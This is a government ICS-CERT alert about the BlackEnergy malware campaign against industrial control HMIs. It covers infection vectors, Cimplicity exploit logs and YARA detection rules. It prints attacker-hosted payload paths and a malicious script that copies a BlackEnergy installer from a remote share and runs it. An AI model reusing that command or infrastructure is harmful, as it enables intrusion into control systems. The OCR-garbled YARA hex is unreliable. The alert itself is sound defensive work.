## Control Systems

## Home

Calendar

## ICSJWG

Information Products

## Training

Recommended Practices

## Assessments

Standards \& References

## Related Sites

PRODUCTS

## Alert (ICS-ALERT-14-281-01C)

More Alerts
Ongoing Sophisticated Malware Campaign Compromising ICS (Update C)
Original release date: December 10, 2014 | Last revised: January 26, 2016

```
Print Tweet & Send & Share
```


## Legal Notice

All information products included in http://ics-cert.us-cert.gov are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see http://www.us-cert.gov/tlp/.

## SUMMARY

This alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01B Ongoing Sophisticated Malware Campaign Compromising ICS that was published December 10, 2014, on the ICS-CERT web site.

ICS-CERT has identified a sophisticated malware campaign that has compromised numerous industrial control systems (ICSs) environments using a variant of the BlackEnergy malware. Analysis indicates that this campaign has been ongoing since at least 2011. Multiple companies working with ICS-CERT have identified the malware on Internet-connected human-machine interfaces (HMIs).
--------- Begin Update C Part 1 of 2 --------
Recent open-source reports have circulated alleging that a December 23, 2015, power outage in Ukraine was caused by BlackEnergy Malware. ICS-CERT and US-CERT are working with the Ukrainian CERT and our international partners to analyze the malware and can confirm that a BlackEnergy 3 variant was present in the system. Based on the technical artifacts ICS-CERT and US-CERT have been provided, we cannot confirm a causal link between the power outage with the presence of the malware. However, we continue to support CERT-UA on this issue. The YARA signature included with the original posting of this alert has been shown to identify a majority of the samples seen as of this update and continues to be the best method for detecting BlackEnergy infections.

While there are many open source reports of BE3, this is the first opportunity ICS-CERT has been able to provide results of malware analysis. In a departure from the ICS product vulnerabilities used to deliver the BE2 malware, in this case the infection vector appears to have been spear phishing via a malicious Microsoft Office (MS Word) attachment. ICS-CERT and US-CERT analysis and support are ongoing, and additional technical analysis will be made available on the USCERT Secure Portal.
--------- End Update C Part 1 of 2 --------
ICS-CERT originally published information and technical indicators about this campaign in a TLP Amber alert (ICS-ALERT-14-281-01P) that was released to the US-CERT secure portala on October 8, 2014, and updated on December 10, 2014. US critical infrastructure asset owners and operators can request access to this information by emailing icscert@hq.dhs.gov■.

## DETAILS

ICS-CERT has determined that users of HMI products from various vendors have been targeted in this campaign, including GE Cimplicity, Advantech/Broadwin WebAccess, and Siemens WinCC. It is currently unknown whether other vendor's products have also been targeted. ICS-CERT is working with the involved vendors to evaluate this activity and also notify their users of the linkages to this campaign.

At this time, ICS-CERT has not identified any attempts to damage, modify, or otherwise disrupt the victim systems' control processes. ICS-CERT has not been able to verify if the intruders expanded access beyond the compromised HMI into the remainder of the underlying control system. However, typical malware deployments have included modules that search out any network-connected file shares and removable media for additional lateral movement within the affected environment. The malware is highly modular and not all functionality is deployed to all victims.

In addition, public reports ${ }^{\mathrm{b}} \mathrm{c}$ reference a BlackEnergy-based campaign against a variety of overseas targets leveraging vulnerability CVE-2014-4114d (affecting Microsoft Windows and Windows Server 2008 and 2012). ICS-CERT has not observed the use of this vulnerability to target control system environments. However, analysis of the technical findings in the two report shows linkages in the shared command and control infrastructure between the campaigns, suggesting both are part of a broader campaign by the same threat actor.

ICS-CERT strongly encourages asset owners and operators to look for signs of compromise within their control systems environments. Any positive or suspected findings should be immediately reported to ICS-CERT for further analysis and correlation.

ICS－CERT analysis has identified the probable initial infection vector for systems running GE＇s Cimplicity HMI with a direct connection to the Internet．Analysis of victim system artifacts has determined that the actors have been exploiting a vulnerability in GE＇s Cimplicity HMI product since at least January 2012．The vulnerability，CVE－2014－0751，was published in ICS－CERT advisory ICSA－14－023－01 on January 23，2014．Guidance for remediation was published to the GE IP portal in December 2013．e GE has also released a statement about this campaign on the GE security web site．$f$

Using this vulnerability，attackers were able to have the HMI server execute a malicious ．cim file［Cimplicity screen file］ hosted on an attacker－controlled server．

| Date | Request Type | Requestor IP | Screen Served |
| :--- | :---: | :---: | :---: |
| 1／17／2012 7：16 | Start | ＜attackerIP＞ | ／／212．124．110．146／testshare／payload．cim |
| 9／9／2013 1：49 | Start | ＜attackerIP＞ | ／／46．165．250．32／incoming／devlist．cim |
| 9／10／2014 3：59 | Start | ＜attackerIP＞ | II94．185．85．122lpubliclconfig．bak |

Figure 1．Log entries showing execution of remote ．cim file．
ICS－CERT has analyzed two different ．cim files used in this campaign：devlist．cim and config．bak．Both files use scripts to ultimately install the BlackEnergy malware．
－devlist．cim：This file uses an embedded script that is executed as soon as the file is opened using the Screen Open event．The obfuscated script downloads the file＂newsfeed．xml＂from the same remote server，which it saves in the Cimplicity directory using the name＜ 41 character string＞．wsf．The name is randomly generated using upper and lower case letters，numbers，and hyphens．The ．wsf script is then executed using the Windows command－based script host（cscript．exe）．The new script downloads the file＂category．xml，＂which it saves in the Cimplicity directory using the name＂CimWrapPNPS．exe．＂CimWrapPNPS．exe is a BlackEnergy installer that deletes itself once the malware is installed．
－config．bak：This file uses a script that is executed when the file is opened using the OnOpenExecCommand event． The script downloads a BlackEnergy installer from a remote server，names it＂CimCMSafegs．exe，＂copies it into the Cimplicity directory，and then executes it．The CimCMSafegs．exe file is a BlackEnergy installer that deletes itself after the malware is installed．

## cmd．exe／c＂copy \194［dot］185［dot］85［dot］122\publicldefault．txt＂\％CIMPATH\％ICimCMSafegs．exe＂\＆\＆start ＂WOW64＂＂\％CIMPATH＂ICimCMSafegs．exe＂

Figure 2．Script executed by malicious config．bak file．
Analysis suggests that the actors likely used automated tools to discover and compromise vulnerable systems．ICS－CERT is concerned that any companies that have been running Cimplicity since 2012 with their HMI directly connected to the Internet could be infected with BlackEnergy malware．ICS－CERT strongly recommends that companies use the indicators and Yara signature in this alert to check their systems．In addition，we recommend that all Cimplicity users review ICS－ CERT advisory ICSA－14－023－01 and apply the recommended mitigations．

## WINCC

While ICS－CERT lacks definitive information on how WinCC systems are being compromised by BlackEnergy，there are indications that one of the vulnerabilities fixed with the latest update for SIMATIC WinCC may have been exploited by the BlackEnergy malware． 9 ICS－CERT strongly encourages users of WinCC，TIA Portal，and PCS7 to update their software to the most recent version as soon as possible．Please see Siemens Security Advisory SSA－134508 圄 and and ICS－CERT advisory ICSA－14－329－02D for additional details．

## ADVANTECH／BROADWIN WEBACCESS

A number of the victims associated with this campaign were running the Advantech／BroadWin WebAccess software with a direct Internet connection．We have not yet identified the initial infection vector for victims running this platform but believe it is being targeted．

## DETECTION

## YARA SIGNATURE

－－－－－－－－－Begin Update C Part 2 of 2 －－－－－－－－－
ICS－CERT has published instruction for how to use the YARA signature for typical information technology environments． ICS－CERT recommends a phased approach to utilize this YARA signature in an industrial control systems（ICSs） environment．Test the use of the signature in the test／quality assurance／development ICS environment if one exists．If not， deploy the signature against backup or alternate systems in the top end of the ICS environment；this signature will not be usable on the majority of field devices．
－－－－－－－－－End Update C Part 2 of 2 －－－－－－－－
ICS－CERT has produced a Yara signature to aid in identifying if the malware files are present on a given system．This signature is provided＂as is＂and has not been fully tested for all variations or environments．Any positive or suspected findings should be immediately reported to ICS－CERT for further analysis and correlation．The Yara signature is available at：
／sites／default／files／file＿attach／ICS－ALERT－14－281－01．yara
YARA is a pattern－matching tool used to by computer security researchers and companies to help identify malware．You can find usage help and download links on the main Yara page at http：／／plusvic．github．io／yara／函．For use on a Windows machine，you can download the precompiled binaries at：

Look for "Windows binaries can be found here." For security purposes, please validate the downloaded Yara binaries by comparing the hash of your downloaded binary with the hashes below:

## Yara version 3.1.0 32-bit

## yara32.exe:

MD5 - fddd3831d7026c81cbd189ac567421ab
SHA256-865992534620d38b988df10a79a39bb12519f44aee8a56233a58cfb54a48c895
yarac32.exe:
MD5 - 87273afb970743c7eee001a3ec6a71cd
SHA256-94ece384cded7e35ca8d600deeea7d59776098f4e459ddab5a94b1f470e59174

## Yara version 3.1.0 64-bit

yara64.exe:
MD5-105c05f8d789e85c36dd845b5fbb323e
SHA256-77c657dacac4d737c3791d284ea8c750ff7fffe88d47397e049586a1980710be
yarac64.exe:
MD5 - c9b79b1a4cf4fb9a31391a1c15bed6d6
SHA256 - 7bfcbafc1b814be1ec337fd653289c073913140325685119445afa471e65eb94

Once downloaded, extract the zip archive to the computer where you need to run the signatures and copy the ICS-CERT Yara rule into the same folder. For a comprehensive search (which will take a number of hours, depending on the system), use the following command:
yara32.exe -r -s ICS-ALERT-14-281-01.yara C: >> yara_results.txt
For a quicker search, use the following:
(for Windows Vista and later)

> yara32.exe -r -s ICS-ALERT-14-281-01.yara C:\Windows >> yara_results.txt
> yara32.exe -r -s ICS-ALERT-14-281-01.yara C:\Users >> yara_results.txt
(for Windows XP or earlier)
yara32.exe -r -s ICS-ALERT-14-281-01.yara C:IWindows >> yara_results.txt
yara32.exe -r -s ICS-ALERT-14-281-01.yara "C:\Documents and Settings" >> yara_results.txt

These commands will create a text file named "Yara_results.txt" in the same folder as the rule and Yara executable. If the search returns hits, you can send this file to ICS-CERT, and ICS-CERT will verify if your system is compromised by BlackEnergy.
//ICS-CERT BlackEnergy Yara rules from ICS-ALERT-14-281-01
rule BlackEnergy2
//ICS-CERT rule to BlackEnergy2 versions 5.0.0 through 7.1 .2 (full) and versions 10.0.0 through 11.1 .0 (light)
//version 3
\{

## strings:

\$a1 = "Adobe Flash Player Installer" wide nocase
$\$ \mathrm{a} 3=$ "regedt32.exe" wide nocase
\$a4 = "WindowsSysUtility" wide nocase
$\$ \mathrm{a6}=$ "USB MDM Driver" wide nocase
\$b1 = \{00 0534000000560053005 F 0056004500520053004900 4F 00 4E 005 F 004900 4E 004600 4F 0000000000 BD 04 EF FE 0000010001000500881528 0A 01000500881528 OA 3F 000000 0000000004000400030000000000000000000000000000005 C 04000001005300740072006900 6E 006700460069006 C 0065004900 6E 0066006 F 000000 1C 020000010030003000310035003000 3400620030000000 4C 00160001004300 6F 00 6D 00700061006 E 007900 4E 006100 6D 0065000000 00004 D 00690063007200 6F 007300 6F 0066007400200043006 F 0072007000 6F 00720061007400 6900 6F 00 6E 0000004600 OF $000100460069006 C 00650044006500730063007200690070007400$

6900 6F 00 6E 00000000005500530042002000 4D 004400 4D 002000440072006900760065007200 00000000 3C 000 E 000100460069006 C 00650056006500720073006900 6F 00 6E 00000000003500 2E 003100 2E 003200360030003000 2E 00350035003100320000004 A 00130001004 C 0065006700 61006 C 0043006 F 007000790072006900670068007400000043006 F 0070007900720069006700 6800740020002800430029002000320030003100330000000000 3E $000 B 000100$ 4F 0072006900 67006900 6E 006100 6C 0046006900 6C 006500 6E 006100 6D 0065000000750073006200 6D 006400 6D 00 2E $0073007900730000000000660023000100500072006 F 006400750063007400$ 4E 006100 6D 00650000000000 4D 00690063007200 6F 007300 6F 00660074002000570069006 E 006400 6F 00 770073002000 4F $007000650072006100740069006 E 0067002000530079007300740065006 \mathrm{D} 00$ 000000004000 OE 00010050007200 FF 00640075006300740056006500720073006900 6F 00 6E 00 00003500 2E 003100 2E 003200360030003000 2E 0035003500310032000000 1C 02000001003000 340030003900300034006200300000004 C 00160001004300 6F 00 6D 00700061006 E 007900 4E 00 61006 D 00650000000000 4D $006900630072006 F 0073006 F 0066007400200043006 F 0072007000$ 6F 007200610074006900 6F 00 6E 00000046000 F $000100460069006 C 0065004400650073006300$ 72006900700074006900 6F 00 6E 00000000005500530042002000 4D $0044004 D 00200044007200$ 690076006500720000000000 3C 000 E $000100460069006 C 006500560065007200730069006 F 00$ 6E 00000000003500 2E 003100 2E 003200360030003000 2E 0035003500310032000000 4A 001300 01004 C 006500670061006 C 004300 6F 007000790072006900670068007400000043006 F 007000 79007200690067006800740020002800430029002000320030003100330000000000 3E $000 B 0001$ 004 F 007200690067006900 6E 006100 6C 00460069006 C 006500 6E 006100 6D 0065000000750073 006200 6D 006400 6D 00 2E 007300790073000000000066002300010050007200 6F 006400750063 007400 4E 006100 6D 00650000000000 4D 00690063007200 6F 0073006 F 00660074002000570069 00 6E 006400 6F 00770073002000 4F 00700065007200610074006900 6E 00670020005300790073 00740065006 D 00000000004000 OE 000100500072006 F 00640075006300740056006500720073 006900 6F 00 6E 0000003500 2E 003100 2E 003200360030003000 2E 003500350031003200000048 $0000000100560061007200460069006 C 00650049006 E 0066006 F 000000000028000800000054$ 0072006100 6E 0073006 C 006100740069006 F 00 6E 00000000001500 B0 040904 B0 04\}
\$b2 = \{34 0334000000560053005 F 0056004500520053004900 4F 00 4E 005 F 004900 4E 004600 4F 0000000000 BD 04 EF FE 0000010003000300040002000300030004000200 3F 000000 0000000004000000010000000000000000000000000000009402000000005300740072006900 6E $006700460069006 C 00650049006 E 0066006 F 0000007002000000003000340030003900300034$ 006500340000004 A 00150001004300 6F 006 D 0070006100 6E 0079004 E 006100 6D 006500000000 005300 6F 006 C 00690064002000530074006100740065002000 4E 00650074007700 6F 007200 6B 007300000000006200 1D $000100460069006 C 0065004400650073006300720069007000740069$ 006 F 00 6E 000000000041006400 6F 0062006500200046006 C 0061007300680020005000 6C 0061 00790065007200200049006 E 007300740061006 C 006 C 00650072000000000030000800010046 0069006 C 006500560065007200730069006 F 006 E 000000000033002 E 003300 2E 003200 2E 0034 00000032000900010049006 E 00740065007200 6E 006100 6C 00 4E 006100 6D 00650000006800 6F 00730074002 E 0065007800650000000000760029000100 4C 00650067006100 6C 0043006 F 0070 $00790072006900670068007400000043006 F 007000790072006900670068007400200028004300$ 2900200041006400 6F 0062006500200053007900730074006500 6D 00730020004900 6E 006300 6F 0072007000 6F 007200610074006500640000000000 3A 00090001004 F 007200690067006900 6E 006100 6C 0046006900 6C 006500 6E 006100 6D 00650000006800 6F 0073007400 2E 0065007800 650000000000 5A 00 1D 00010050007200 6F 006400750063007400 4E 006100 6D 00650000000000 $410064006 F 0062006500200046006 \mathrm{C} 00610073006800200050006 \mathrm{C} 0061007900650072002000$ 49006 E 007300740061006 C 006 C 006500720000000000340008000100500072006 F 0064007500 6300740056006500720073006900 6F 006 E 0000003300 2E 003300 2E 003200 2E 00340000004400 00000000560061007200460069006 C 00650049006 E 0066006 F 00000000002400040000005400 72006100 6E 007300 6C 00610074006900 6F 00 6E 00000000000904 E4 04464532 58\}
\$b3 = \{C8 023400000056005300 5F 0056004500520053004900 4F 00 4E 00 5F 004900 4E 0046004 F 0000000000 BD 04 EF FE 00000100010005008815280 A 010005008815280 A 17000000 0000000004000400030000000000000000000000000000002802000001005300740072006900 6E $006700460069006 C 0065004900$ 6E $0066006 F 0000000402000001003000340030003900300034$ 006500340000004 C 00160001004300 6F 006 D 0070006100 6E 0079004 E 0061006 D 006500000000 00 4D 00690063007200 6F 007300 6F 006600740020004300 6F 0072007000 6F 0072006100740069 $006 F 006 E 000000480010000100460069006 C 0065004400650073006300720069007000740069$ $006 F 006 E 0000000000490044004500200050006 F 007200740020004400720069007600650072$ 000000620021000100460069006 C 006500560065007200730069006 F 006 E 00000000003500 2E 003100 2E 003200360030003000 2E 003500350031003200200028007800700073007000 2E 0030 $00380030003400310033002 D 0030003800350032002900000000004 \mathrm{~A} 0013000100$ 4C 00650067 0061006 C 004300 6F 007000790072006900670068007400000043006 F 00700079007200690067 00680074002000280043002900200032003000300039000000000066002300010050007200 6F 00 6400750063007400 4E 006100 6D 00650000000000 4D 00690063007200 6F 0073006 F 0066007400 2000570069006 E 0064006 F 007700730020004 F 007000650072006100740069006 E 0067002000 530079007300740065006 D 000000000040000 E 000100500072006 F 0064007500630074005600 6500720073006900 6F 00 6E 0000003500 2E 003100 2E 0032003600300030002 E 00350035003100 32000000440000000100560061007200460069006 C 00650049006 E 0066006 F 00000000002400 040000005400720061006 E 0073006 C 00610074006900 6F 006 E 00000000000904 E4 04\}
\$b4 = \{9C 033400000056005300 5F 0056004500520053004900 4F 00 4E 00 5F 004900 4E 004600 4F 0000000000 BD 04 EF FE 00000100010006000140 B0 1D 010006000140 B0 1D 3F 000000 000000000400040001000000000000000000000000000000 FA 02000001005300740072006900 6E $006700460069006 C 0065004900$ 6E $0066006 F 000000$ D6 02000001003000340030003900300034 004200300000004 C 00160001004300 6F 006 D 0070006100 6E 0079004 E 0061006 D 006500000000 00 4D 00690063007200 6F 007300 6F 006600740020004300 6F 0072007000 6F 0072006100740069 006 F 00 6E 000000580018000100460069006 C 0065004400650073006300720069007000740069 $006 F 006 \mathrm{E} 00000000005200650067006900730074007200790020004500640069007400$ 6F 0072 $0020005500740069006 C 0069007400790000006 C 0026000100460069006 C 0065005600650072$ 0073006900 6F $006 E 00000000003600$ 2E 003100 2E 003700360030003000 2E 0031003600330038 $00350020002800770069006 E 0037005$ F $00720074006 D 00$ 2E 00300039003000370031003300 2D 00310032003500350029000000 3A 00 OD 0001004900 6E 00740065007200 6E 006100 6C 00 4E 0061 006 D 006500000072006500670065006400740033003200 2E 00650078006500000000008000 2E 0001004 C 00650067006100 6C 0043006 F 0070007900720069006700680074000000 A9 002000 4D 00690063007200 6F 007300 6F $0066007400200043006 F 00720070006 F 007200610074006900$ 6F 006 E 00 2E 0020004100 6C 006 C 0020007200690067006800740073002000720065007300650072 00760065006400 2E 00000042000 D 0001004 F 0072006900670069006 E 006100 6C 0046006900 6C

006500 6E 0061006 D 006500000072006500670065006400740033003200 2E 0065007800650000 000000 6A 002500010050007200 6F 006400750063007400 4E 006100 6D 00650000000000 4D 0069 0063007200 6F 007300 6F 0066007400 AE 00200057006900 6E $0064006 F 0077007300$ AE 002000 4F $007000650072006100740069006 E 0067002000530079007300740065006 \mathrm{D} 00000000004200$ OF $000100500072006 F 006400750063007400560065007200730069006 F 006 E 0000003600$ 2E 0031 00 2E $0037003600300030002 E 003100360033003800350000000000440000000100560061007200$ 460069006 C 00650049006 E 006600 6F 0000000000240004000000540072006100 6E 007300 6C 00 610074006900 6F 00 6E 00000000000904 BO 04\}
\$b5 = \{ 78033400000056005300 5F 0056004500520053004900 4F 004 E 005 F 004900 4E 004600 4F 0000000000 BD 04 EF FE 0000010000000500 6A 44 B1 1D 00000500 6A 44 B1 1D 3F 000000 000000000400040001000000000000000000000000000000 D6 02000001005300740072006900 6E 006700460069006 C 0065004900 6E 0066006 F 000000 B2 020000010030003400300039003000 3400420030000000 4C 00160001004300 6F 00 6D 0070006100 6E 007900 4E 006100 6D 0065000000 00004 D 006900630072006 F 007300 6F 006600740020004300 6F 0072007000 6F 00720061007400 6900 6F 00 6E 0000004 E 0013000100460069006 C 00650044006500730063007200690070007400 6900 6F 00 6E 000000000057006900 6E 006400 6F 0077007300 AE 00530079007300550074006900 6C 006900740079000000000072002900010046006900 6C $006500560065007200730069006 F 00$ $6 E 000000000035002 E 003000$ 2E $0037003600300031002 E 003100370035003100340020002800$ $770069006 E 0037007300700031005 F 00720074006 D 00$ 2E 00310030003100310031003900 2D 00 31003800350030002900000000003000080001004900 6E 00740065007200 6E 006100 6C 00 4E 00 61006 D 00650000006 D 0073006900650078006500630000008000 2E 000100 4C 00650067006100 6C 004300 6F 0070007900720069006700680074000000 A9 002000 4D 00690063007200 6F 007300 6F 006600740020004300 6F 0072007000 6F 007200610074006900 6F 00 6E 00 2E 0020004100 6C 00 6C $0020007200690067006800740073002000720065007300650072007600650064002 E 000000$ 4000 OC 0001004 F 007200690067006900 6E 006100 6C 0046006900 6C 006500 6E 006100 6D 006500 00006 D 00730069006500780065006300 2E 0065007800650000005800 1C 00010050007200 6F 00 6400750063007400 4E 006100 6D 00650000000000570069006 E 0064006 F 007700730053007900 7300550074006900 6C 006900740079002000 2D 00200055006 E 0069006300 6F 00640065000000 42000 F $000100500072006 F 006400750063007400560065007200730069006 F 006 E 0000003500$ 2E 003000 2E 003700360030003100 2E 0031003700350031003400000000004400000001005600 6100720046006900 6C 0065004900 6E $0066006 F 0000000000240004000000540072006100$ 6E 00 7300 6C 00610074006900 6F 00 6E 00000000000904 B0 04\}
\$b6 = \{D4 023400000056005300 5F 0056004500520053004900 4F 00 4E 00 5F 004900 4E 0046004 F 0000000000 BD 04 EF FE 0000010001000500881528 OA 010005008815280 A 17000000 0000000004000400030000000000000000000000000000003402000001005300740072006900 6E $006700460069006 C 00650049006 E 0066006 F 0000001002000001003000340030003900300034$ 006500340000004 C 00160001004300 6F 006 D 0070006100 6E 0079004 E 006100 6D 006500000000 00 4D 00690063007200 6F 007300 6F 006600740020004300 6F 0072007000 6F 0072006100740069 00 6F 00 6E 0000004 E $0013000100460069006 C 0065004400650073006300720069007000740069$ $006 F 006 \mathrm{E} 0000000000530065007200690061006 \mathrm{C} 0020005000$ 6F 007200740020004400720069 0076006500720000000000620021000100460069006 C 00650056006500720073006900 6F 00 6E 00000000003500 2E 003100 2E 003200360030003000 2E 00350035003100320020002800780070 00730070002 E 003000380030003400310033002 D 003000380035003200290000000000 4A 0013 $0001004 C 006500670061006 C 0043006 F 00700079007200690067006800740000004300$ 6F 0070 0079007200690067006800740020002800430029002000320030003000340000000000 6A 002500 010050007200 6F 006400750063007400 4E 0061006 D 00650000000000 4D 00690063007200 6F 00 7300 6F 0066007400 AE 00200057006900 6E 006400 6F 0077007300 AE 002000 4F 00700065007200 610074006900 6E 0067002000530079007300740065006 D 000000000040000 E 00010050007200 6F $006400750063007400560065007200730069006 F 006 E 00000035002 E 003100$ 2E 0032003600 $300030002 E 0035003500310032000000440000000100560061007200460069006 C 0065004900$ 6E 006600 6F 00000000002400040000005400720061006 E $0073006 \mathrm{C} 006100740069006 F 00$ 6E 00 000000000904 E4 04\}
condition:
(uint16(0) $==0 \times 5$ A4D and uint32(uint32(0x3C)) $==0 \times 00004550$ ) and (((any of (\$a*)) and
(uint32 (uint32 $(0 \times 3 C)+8)==0 \times 00000000$ )) or (for any of (\$b*): (\$ in (uint32 (uint32(0x3C)+248+(40* (uint16(uint32(0x3C)+6)-1)+20))..(uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)1) +20$)$ ) + uint $32\left(\right.$ uint $32(0 \times 3 C)+248+\left(40^{*}(\right.$ uint16(uint32(0×3C) $\left.\left.\left.\left.\left.\left.\left.\left.)+6\right)-1\right)+16\right)\right)\right)\right)\right)\right)$ )
\}
rule BlackEnergy2_USBInfected
//ICS-CERT rule to detect .exe's infected by BlackEnergy JN plugin for JN versions 7 (full), 75 (light)
//version 1
\{
strings:
\$f1 = \{5E 81 EC 04010000 8B D4 680401000052 6A 00 FF 57 1C 8B D4 33 C9 03 D0 4A 41 3B C8 740580 3A 5C 75 F5 4281 EC 04010000 8B DC 5251536804010000 FF 5720595 A 66 C7 $04035 C 2056$ 57 8D 3C 03 8B F2 F3 A4 C6 0700 5F 5E 33 C0 5068800000006 A 025050680000004053 FF 571453 8B 4F 4C 8B D6 33 DB 30 1A 4243 3B D9 7C F8 5B 83 EC 04 8B D4 50 6A 0052 FF 77 4C 8B D6 5250 FF 5724 FF 57 18\}
\$f2 = \{5E 83 EC 1C 8B 4508 8B 4D 080348 3C $894 D$ E4 8975 EC 8B 4508 2B 45108945 E8 33 C0 8945 F4 8B 550 C 3B 55 F4 0F 8698000000 8B 45 EC 8B 4D F4 03480489 4D F4 8B 55 EC 8B 420483 E8 08 D1 E8 8945 F8 8B 4D EC 83 C1 0889 4D FC\}
\$f3 = \{5F 8B DF 83 C3 60 2B 5F 5489 5C 2420 8B 442424250000 FF FF $668 B 186681$ FB 4D 5A 7407 2D 00000100 EB EF 8B 48 3C 03 C8 668 B 196681 FB 504575 E0 8B E8 8B F7 83 EC 60 8B FC B9 6000 0000 F3 A4 83 EF 60 6A 0D 59 E8 88000000 E2 F9 68 6C 33320068736865 6C 54 FF 57\}

## \$a1 at entrypoint or any of (\$f*)

\}
rule BlackEnergy3
//ICS-CERT rule to detect BlackEnergy3 versions 1.1.0 through 1.2.5
//version 1
\{

## strings:

## /elements from the .LNK file created for persistence

$\$ 11=\{72007500$ 6E 006400 6C 00 6C 0033003200 2E 006500780065000000 1C 000000 2C 002 E 002 E 005 C 002 E 002 E 005 C 002 E 002 E 005 C 002 E 002 E 005 C 002 E 002 E 005 C 00570049004 4 004400 4F 0057005300 5C 00730079007300740065006 D 00330032005 C 00720075006 E 006400 6C 00 6C 0033003200 2E 0065007800650013004300 3A 005 C 00570049004 E 004400 4F 0057005300 5C 00730079007300740065006 D 00330032005 C 0022004300 3A 005 C 0044006 F 00630075006 D 0065 006 E 007400730020006100 6E 0064002000530065007400740069006 E 0067007300 5C 00410064 006 D 006900 6E 00690073007400720061007400 6F 007200 5C 004 C 006 F 0063006100 6C 00200053 0065007400740069006 E 00670073005 C 00410070007000 6C 0069006300610074006900 6F 00 6E 0020004400610074006100 5C\}

## //resource from loader file

\$r1 = \{78 033400000056005300 5F 0056004500520053004900 4F 00 4E 005 F 004900 4E 004600 4F 0000000000 BD 04 EF FE 0000010000000500 6A 44 B1 1D 00000500 6A 44 B1 1D 3F 000000 000000000400040001000000000000000000000000000000 D6 02000001005300740072006900 6E 006700460069006 C 0065004900 6E 0066006 F 000000 B2 020000010030003400300039003000 34004200300000004 C 00160001004300 6F 00 6D 0070006100 6E 007900 4E 006100 6D 0065000000 00004 D 00690063007200 6F 000000 6F 0066007400200043006 F 00720070006 F 00720061007400 6900 6F 00 6E 000000 4E 001300010046006900 6C 00650044006500730063007200690070007400 6900 6F 00 6E 000000000057006900 6E $0064006 F 0077007300$ AE 00530079007300550074006900 6C $0069007400790000000000720029000100460069006 C 006500560065007200730069006 F 00$ 6E 00000000003500 2E 003000 2E 003700360030003100 2E 003100370035003100340020002800 77006900 6E 0037007300700031005 F 0072007400 6D 00 2E 00310030003100310031003900 2D 00 $310038003500300029000000000030000800010049006 E 00740065007200$ 6E 006100 6C 00 4E 00 61006 D 00650000006 D 0073006900650078006500630000008000 2E 000100 4C 00650067006100 6C 004300 6F 0070007900720069006700680074000000 A9 $0020004 D 006900630072006 F 007300$ 6F 006600740020004300 6F 0072007000 6F 007200610074006900 6F 00 6E 00 2E 0020004100 6C 00 6C $0020007200690067006800740073002000720065007300650072007600650064002 E 000000$ 4000 OC 000100 4F 007200690067006900 6E 006100 6C 0046006900 6C 006500 6E 006100 6D 006500 00006 D 00730069006500780065006300 2E 0065007800650000005800 1C 00010050007200 6F 00 64007500630074004 E 006100 6D 00650000000000570069006 E 006400 6F 007700730053007900 7300550074006900 6C 006900740079002000 2D 00200055006 E 0069006300 6F 00640065000000 42000 F $000100500072006 F 006400750063007400560065007200730069006 F 00000000003500$ 2E 003000 2E 003700360030003100 2E 0031003700350031003400000000004400000001005600 6100720046006900 6C 0065004900 6E 006600 6F 0000000000240004000000540072006100 6E 00 7300 6C 00610074006900 6F 00 6E 00000000000904 B0 04\}
//sections of code from loader
\$sa1 = \{55 8B EC 83 EC 24535657 C7 45 F8 00000000 C7 45 F4 6400000083 EC 10 C7 45 EC 5A 000000 C 745 E 046000000 C 745 E 85 A 000000 C 745 E 446000000 6A 018 D 45 E0 50 E8 2F FC FF FF 89 45 FC 8B 4D FC 89\}
condition:
any of them
\}
rule BlackEnergy_findFunc
//ICS-CERT rule to detect BlackEnergy2 "light" and BlackEnergy3. Will not detect BE2 sys variant.
//version 1
\{
strings:
\$sb1 $=\{C 7[1-5] 3332$ 2E 64 C7 [1-5] 777332 5F 66 C7 [1-5] 6C 6C\}//ws3_32.dll
\$sb2 $=\{C 7$ [1-5] 75736572 C7 [1-5] 3332 2E 6466 C7 [1-5] 6C 6C\} //user32.dII

$$
\begin{aligned}
& \text { \$sb3 }=\{C 7 \text { [1-5] } 61647661 \text { C7 [1-5] } 70693332 \text { C7 [1-5] 2E } 64 \text { 6C 6C }\} / / a d v a p i 32 . d I l \\
& \text { \$sb4 }=\{C 7 \text { [1-5] } 7769 \text { 6E } 69 \text { C7 [1-5] 6E } 6574 \text { 2E C7 [1-5] } 64 \text { 6C 6C\} //wininet.dll } \\
& \text { \$sb5 }=\{\text { C7 [1-5] } 736865 \text { 6C C7 [1-5] 6C } 3332 \text { 2E C7 [1-5] 64 6C 6C }\} / / \text { shell32.dll } \\
& \text { \$sb6 }=\{\text { C7 [1-5] } 70736170 \text { C7 [1-5] } 69 \text { 2E } 64 \text { 6C } 66 \text { C7 [1-5] 6C\} //psapi.dII } \\
& \text { \$sb7 = \{C7 [1-5] 6E } 657461 \text { C7 [1-5] } 70693332 \text { C7 [1-5] 2E } 64 \text { 6C 6C\} //netapi32.dIl } \\
& \text { \$sb8 }=\{C 7[1-5] 76657273 \text { C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C }\} / / v e r s i o n . d I I \\
& \text { \$sb9 }=\{\text { C7 [1-5] 6F 6C } 6561 \text { C7 [1-5] } 75743332 \text { C7 [1-5] 2E } 64 \text { 6C 6C }\} \text { //oldaut32.dII } \\
& \$ \mathrm{sb} 10=\{\mathrm{C} 7 \text { [1-5] } 69 \text { 6D } 6167 \text { C7 [1-5] } 6568 \text { 6C } 70 \text { C7 [1-5] 2E } 64 \text { 6C 6C\} //imagehlp.dll }
\end{aligned}
$$

condition：

$$
3 \text { of them }
$$

\}

## MITIGATIONS

ICS－CERT has published a TLP Amber version of this alert containing additional information about the malware，plug－ins， and indicators to the secure portal．ICS－CERT strongly encourages asset owners and operators to use these indicators to look for signs of compromise within their control systems environments．Asset owners and operators can request access to this information by emailing ics－cert＠dhs．gov■．

Any positive or suspected findings should be immediately reported to ICS－CERT for further analysis and correlation．
ICS－CERT strongly encourages taking immediate defensive action to secure ICS systems using defense－in－depth principles．CSSP Recommended Practices，https：／／ics－cert．us－cert．gov／Recommended－Practices，web site last accessed October 28，2014．Asset owners should not assume that their control systems are deployed securely or that they are not operating with an Internet accessible configuration．Instead，asset owners should thoroughly audit their networks for Internet facing devices，weak authentication methods，and component vulnerabilities．Control systems often have Internet accessible devices installed without the owner＇s knowledge，putting those systems at increased risk of attack．

